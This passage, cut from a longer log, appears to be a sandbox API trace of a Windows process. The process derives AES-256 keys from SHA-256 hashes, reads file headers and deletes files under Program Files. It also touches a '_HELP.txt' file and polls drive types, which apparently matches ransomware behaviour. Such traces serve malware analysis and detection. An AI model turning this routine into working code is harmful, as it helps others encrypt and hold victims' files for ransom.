(hProv=0xa52568, dwFlags=0x0) returned 1 [0140.201] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg")) returned 0 [0140.202] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.202] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.202] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.202] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.202] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0140.202] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.204] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.204] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.204] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.205] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm")) returned 0 [0140.207] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.207] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.207] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.207] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.207] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x127e [0140.207] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.210] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.210] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.210] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.211] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0 [0140.213] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.213] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.213] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.213] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.213] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7c6 [0140.213] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.223] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.223] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.223] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.225] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg")) returned 0 [0140.226] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.226] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.226] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.226] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.226] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe8 [0140.226] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.228] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.228] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.228] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.229] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm")) returned 0 [0140.231] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.232] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.232] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.232] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.232] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2949 [0140.232] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.235] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.235] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.235] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.237] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg")) returned 0 [0140.248] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.248] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.249] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.249] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.249] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe6 [0140.249] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.250] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.250] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.250] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.252] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm")) returned 0 [0140.253] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.253] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.253] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.253] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.253] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d51 [0140.253] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.257] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.257] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.257] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.259] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg")) returned 0 [0140.260] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.260] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.260] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.260] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.260] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x748 [0140.260] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.263] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.263] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.263] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.265] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif")) returned 0 [0140.266] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.266] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.266] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.266] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.266] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe42 [0140.266] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.269] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.269] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.269] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.270] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg")) returned 0 [0140.271] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.271] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.271] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.272] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.272] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x121e [0140.272] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.275] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.275] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.275] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.276] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif")) returned 0 [0140.278] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.279] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.279] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.279] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.279] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc60 [0140.279] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.282] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.282] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.282] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.283] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg")) returned 0 [0140.284] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.284] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.285] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.285] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.285] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ad7 [0140.285] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.289] CryptDestroyHash (hHash=0x284d668) returned 1 [0140.289] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.289] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.290] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif")) returned 0 [0140.291] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0140.292] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0140.292] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.292] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0140.292] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0140.292] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0140.293] CryptDestroyHash (hHash=0x284d568) returned 1 [0140.293] CryptDestroyKey (hKey=0x284d628) returned 1 [0140.293] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0140.294] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\_HELP.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\_help.txt")) returned 1 [0140.295] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.295] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.304] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.305] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.306] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.316] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.317] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.317] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.324] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.325] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.325] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.326] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.326] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.327] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.328] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.328] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.329] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.329] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.344] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.345] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.346] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.346] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.352] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.362] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.362] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.390] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.391] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.392] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.392] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.392] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.393] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.393] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.394] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.402] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.402] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.403] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.403] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.404] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.404] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.405] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.406] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.407] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.407] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.408] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.408] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.409] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.410] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.410] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.437] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.438] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.438] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.439] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.439] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.440] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.440] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.440] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.441] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.442] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.442] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.455] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.456] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.460] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.464] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.465] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.467] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.484] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.484] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.485] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.485] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.486] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.486] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.487] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.487] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.487] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.488] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0140.489] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0140.489] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.489] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0140.489] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8e [0140.489] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0140.510] CryptDestroyHash (hHash=0x284d528) returned 1 [0140.510] CryptDestroyKey (hKey=0x284d668) returned 1 [0140.510] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.511] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 1 [0140.511] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.512] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.512] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.512] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.512] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.514] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.522] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.522] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.522] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.524] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.525] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.527] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.527] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.528] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.528] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.529] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.529] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.531] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0140.533] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0140.533] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0140.533] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0140.533] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0140.533] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d1f [0140.533] ReadFile (in: hFile=0x40c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0140.549] CryptDestroyHash (hHash=0x284d628) returned 1 [0140.549] CryptDestroyKey (hKey=0x284d668) returned 1 [0140.549] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0140.552] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png")) returned 0 [0140.552] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0140.553] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0140.553] CryptHashData 